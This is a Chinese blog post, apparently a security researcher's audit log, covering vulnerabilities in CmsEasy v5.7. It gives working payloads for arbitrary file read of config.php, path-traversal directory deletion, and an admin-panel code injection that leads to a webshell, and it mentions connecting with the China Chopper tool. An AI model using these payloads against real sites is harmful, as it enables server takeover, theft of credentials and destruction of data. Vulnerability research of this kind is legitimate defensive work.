CmsEasy_v5.7 漏洞测试

01

前言

下载了一套CMS,看了一下,部分代码加密,也懒得去解密了,费事。直接登录后台进行黑盒结合白盒进行测试,也发现了一些问题,汇总一下,不做具体代码分析。

02

环境准备

CmsEasy官网:http://www.cmseasy.cn

网站源码版本:CmsEasy_v5.7_UTF8-0208

程序源码下载: http://ftp.cmseasy.cn/CmsEasy5.x/CmsEasy_5.7_UTF-8_20180208.zip

默认后台: http://127.0.0.1/index.php?case=admin&act=login&admin_dir=admin&site=default

查看CMS版本:http://127.0.0.1/cache/data/inf.txt

账号密码 自设

03

任意文件读取

读取config.php配置文件内容

Payload:http://127.0.0.1/index.php?case=template&act=fetch&admin_dir=admin&site=default

【POST】:&id=../../config/config.php

04

任意目录删除

网站根目录新建test目录作为测试目录

Payload:http://127.0.0.1/index.php?case=database&act=restore&admin_dir=admin&site=default

【POST】:select%5B%5D=../test&submit=+%C3%97+%E5%88%A0%E9%99%A4+

05

存储型XSS

06

后台Getshell

代码分析:

漏洞文件位置:/lib/table/table_templatetagwap.php 第3-20行:

1.classtable_templatetag extends table_mode {

2.function vaild() {

3.if(!front::post('name')) {

4.front::flash('请填写名称!');

5.returnfalse;

6.}

7.if(!front::post('tagcontent')) {

8.front::flash('请填写内容!');

9.returnfalse;

10.}

11.returntrue;

12.}

13.function save_before() {

14.if(!front::post('tagfrom')) front::$post['tagfrom']='define';

15.if(!front::post('attr1')) front::$post['attr1']='0';

16.if(front::$post['tagcontent']) front::$post['tagcontent'] = htmlspecialchars_decode(front::$post['tagcontent']);

17.}

18.}

可以看到在写入文件之前,使用htmlspecialchars_decode函数把预定义的 HTML 实体""(大于)转换为字符。因此我们可以使用双引号闭合,从而构造出Payload写入文件,进一步触发代码,导致程序在实现上存在代码执行漏洞。攻击者可通过构造恶意脚本代码写入配置文件,从而执行命令,控制网站服务器权限。

漏洞利用:

1、登录后台,模板--自定义标签—添加自定义标签--填写Payload—提交: Payload: 1111111111";}

2、提交保存后,点击预览,成功触发代码,或者查看id的值,然后直接访问文件路径:http://127.0.0.1/config/tag/category_13.php

3、附绕代码检测的一句话Payload: 11";}

通过菜刀连接,控制网站服务器:

07

总结

一次不太成功的代码审计日志,因部分代码加密,使用黑盒结合白盒的手法,根据功能点进行审计,可以快速发掘程序中存在的安全漏洞。接下来,将不定时更新各种CMS的代码审计文章,欢迎志同道合的朋友来相互探讨,交流。

Bypass

About Me

一个网络安全爱好者,对技术有着偏执狂一样的追求。致力于分享原创高质量干货,包括但不限于:渗透测试、WAF绕过、代码审计、安全运维。

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20180305G0HIZ100?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券